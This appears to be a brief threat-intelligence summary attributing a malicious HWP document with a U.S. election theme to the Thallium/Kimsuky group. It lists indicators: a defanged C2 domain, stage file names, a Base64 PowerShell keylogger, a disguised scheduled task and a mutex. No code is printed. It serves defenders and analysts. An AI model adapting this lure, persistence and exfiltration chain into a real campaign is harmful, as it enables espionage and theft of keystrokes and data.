ESRC attributed a malicious HWP document themed as U.S. election prediction press content to the North Korea-linked Thallium/Kimsuky group. The document hid an OLE object containing Hancom.Configuration.VBS and used xeoskin.co[.]kr as C2, with stages including cross.php parameters, suf.hta, report.php uploads, and a Base64-encoded PowerShell keylogger path. The workflow collected system and process information, Base64-encoded local XML data, created an hourly AhnlabUpdate scheduled task, and reused markers previously associated with Thallium, including the multipart boundary string and the Global\AlreadyRunning191122 mutex. The lure exploited interest in post-election U.S.–North Korea policy while relying on user interaction with HWP security prompts to activate the payload.